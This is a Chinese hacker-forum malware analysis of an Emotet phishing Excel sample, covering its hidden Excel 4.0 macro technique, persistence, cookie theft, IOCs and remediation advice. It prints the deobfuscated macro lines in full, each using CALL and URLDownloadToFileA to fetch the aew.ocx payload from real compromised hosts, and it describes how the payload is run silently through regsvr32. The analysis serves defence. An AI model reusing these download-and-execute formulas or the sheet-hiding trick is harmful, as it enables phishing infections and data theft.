跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

emotet木马病毒家族分析与excel宏表函数

精选回复

发布于

emotet木马病毒家族分析与excel宏表函数

起因

某公司邮服收到大量恶意钓鱼邮件,有员工中招后被拖通讯录,公司内大量邮箱账号密码遭到爆破。

家族背景

Emotet于2014 年被首次发现,最初是作为一种银行木马病毒进行传播,但随着发展逐渐囊括了越来越多的恶意程序,如Trickbot 和 QBot,以及勒索软件Conti、ProLock、Ryuk和 Egregor等,构建成了一个庞大的僵尸网络。

样本分析

样本属性

文件名:VBUQ-2683135.xlsm

文件类型:Microsoft Excel 启用宏的工作表 (.xlsm)

MD5:129114c1b5589116cfa4af9058801b6a

SHA1:0bfff936fcb796e1600805ce789723f51fac6e78

SHA256:83f9bd1734c030f5053d4ab28eba39d91fdf880d1b7bb39b98602912e81ff709

邮件样本

邮件样本如下:

g1ao4mkskuy3512.png

解压后得到excel文件

常见的office文档诱饵,引导受害者点击启用内容加载宏代码,如下图:

o2wn3r1g1mx3513.png

攻击方式

此次钓鱼邮件利用手法比较新颖,能够规避一般类型的检测。

垃圾邮件中传播使用zip格式的压缩包中包含OFFICE文档或VBS脚本,这样做可以绕过CDR(内容撤防与重建)技术。在大规模网络钓鱼攻击活动期间,CDR会对进入的文件进行解构,并检查其中是否包含恶意组件。如果包含恶意组件,它会删除这些恶意组件,重新构建一个全新的版本传递给网络上的最终用户。此次样本不会在邮件中直接包含恶意组件,而是将恶意组件进行压缩投递并加密,可以绕过CDR检测技术。

攻击者中放弃使用exe文件以下载后续有效载荷,转而使用dll文件作为后续载荷。本次宏病毒利用了Excel 4.0宏在Excel文档中的存储方式,并结合了字体颜色、工作表隐藏和列隐藏等技巧隐藏Excel 4.0宏代码。详细分析过程如下:

首先攻击者将工作表隐藏,只留下了sheet1作为诱饵图片引诱受害者点击启用内容调用宏代码

先把隐藏的工作表显示出来:

0qrfo4x3phm3514.png

显示隐藏的白色字体:

zmqnzf14vgm3515.png

显示后为攻击者的字典表,其他表会通过excel的拼接调用这张表的字符来组成攻击语句

msmi5c1malp3516.png

同样的方法显示其余工作表,可以看到攻击者会去请求以下URL地址

rredlpeqkdr3517.png

入口函数:

xniigec2ckp3518.png

通过拼接Vfrbuk1工作表组成恶意语句

sz4srusyhso3520.png

这里的EFALGV表启用了excel 4.0的宏表函数

将列的第一个单元格重命名为Auto_Open,会使整列按顺序执行宏表函数

其中D1的单元格名称就为Auto_Open

jts3rpgvurq3522.png

宏代码分析

点击启用内容后,自动拼接成如下语句

g0spdoom1kh3524.png

FORMULA(a,b)是excel4.0宏表函数,意思是把a的值赋值给b

CALL()只在excel宏表上可用,用来调用动态链接库dll文件

最后通过EXEC()函数来执行命令,利用regsvr32.exe调用dll文件(aew.ocx),/s为静默运行

启用内容后:

3202kv0iczv3525.png

aew.ocx文件会写入用户目录,之后会把自身拷贝到AppData\Local目录的随机名文件夹下

恶意程序会向注册表写入一条启动项

计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

ff2eejacqi53526.png

glmrj1mjkag3527.png

可执行文件分析

小编对二进制及逆向研究不深 此小章可能有许多纰漏,希望师傅们能与我交流指正

没有找到如绿盟(http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/)这篇分析文章 有关窃取邮箱的伪代码 有熟悉x64dbg、IDA的师傅们可以联系我 想学习一下

aew.ocx可执行文件

zhkxvaimy0n3528.png

以下分析这个aew.ocx可执行文件

wininet dll断点

5rvpqpmwuvo3529.png

读取浏览器Internet存储的临时文件,历史记录和cookie

sfgd0fj4otb3531.png

vw41g5bie0q3532.png

vrg5trowbbu3533.png

断在httpsendRequestW,此时c2 list已经解密成功了,我们从cookie往上翻一点就可以找到

04ri4npznk23534.png

minh0dl1ked3535.png

流量分析

单步调试宏表函数

有https的抓不到流量,在复现的时候目标网站均已无法下载ocx文件

=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabdsangramnews.com/wp-includes/0EkuXhpisAiyU/","..\aew.ocx",0,0)

v5ej00jvchr3537.png

=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newmainghantabazar.com/wp-includes/UOMqB99D/","..\aew.ocx",0,0))

20kbjzlrpe43540.png

=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dehraduncabs.com/wp-includes/nQrr0/","..\aew.ocx",0,0))

pdsumxv4jwt3543.png

=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://patriciamirapsicologa.com/wp-includes/OfXgW/","..\aew.ocx",0,0))

5x024pueimx3551.png

=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vdheuvel.net/gallerijen/MZM66d1KZQI0IjLc/","..\aew.ocx",0,0))

i4bb5gxzyhy3552.png

=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://googletopstories.in/wp-admin/css/colors/4Fx/","..\aew.ocx",0,0))

4nyxza5hlez3557.png

查杀结果

结合云沙箱运行文件和ip域名查询

VT查杀

n1vgsvqdd343558.png

查询IP:185.168.130.138

xeulnhqvvdj3559.png

aew.ocx查杀结果:

msxyaswgum13562.png

IOCs(失陷指标)

shabdsangramnews.com
newmainghantabazar.com
dehraduncabs.com
patriciamirapsicologa.com
vdheuvel.net
googletopstories.in
168.119.39.118
185.168.130.138
168.197.250.14
195.77.239.39
68.183.93.250
185.184.25.78
118.98.72.86
78.47.204.80
159.69.237.188
61.7.231.226
103.41.204.169
207.148.81.119
85.214.67.203
190.90.233.66
191.252.103.16
93.104.209.107
194.9.172.107
66.42.57.149
59.148.253.194
62.171.178.147
139.196.72.155
198.199.98.78
185.148.168.15
195.154.146.35
104.131.62.48
37.44.244.177
217.182.143.207
54.38.242.185
185.148.168.220
203.153.216.46
87.106.97.83
78.46.73.125
54.37.106.167
37.59.209.141
54.37.228.122
61.7.231.229
45.71.195.104
116.124.128.206
128.199.192.135
210.57.209.142

TTPs(战术、技术&程序)

ATT&CK:TA0003(https://attack.mitre.org/tactics/TA0003/)

1.攻击者通过大量投放钓鱼邮件,引导用户查看excel文档

2.利用文档中带有迷惑性的图片诱导用户点击启用内容(启用宏)

3.向攻击者的C2服务器请求内容,下载木马,达到控制计算机,实现数据窃取等黑客行为。

攻击链路:mail->excel(xlsm excel 4.0macro)->regsvr32.exe -s ..\[random].ocx->c2 server

fjfo5ivwspa3563.png

处置建议

宏表函数(Excel Macro4.0)是一项很老的技术了,默认设置下都会禁用,但是作为excel本身自带的功能,会对其警惕性降低,在以前这项技术没有过多的往安全性上去考虑,微软在 1993 年用 VBA 取代了 Excel 4.0 宏,但它们仍然可以运行,现在热度上升是因为被黑客盯上了。

1.不接收和下载陌生邮件内容

2.默认设置禁用宏,如无必要不启用宏内容

3.清理注册表(计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)

4.删除AppData\Local下的恶意程序

5.安装杀软(火绒可以检测此次emotet样本)

参考文章

https://www.antiy.com/response/20210206.html

http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/

https://www.joesandbox.com/analysis/581892/0/html

https://www.fortinet.com/blog/threat-research/analysis-of-the-new-modules-that-emotet-spreads

https://stackoverflow.com/questions/41402120/what-is-excel-4-0-macro

https://attack.mitre.org/tactics/TA0003/

感谢此次分析工作中@DDD@gd@Scr1pt的支持与帮助

本博文仅限于博主个人学习和分享使用,请勿用于违法行为。如有侵权,请联系一定删除!

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。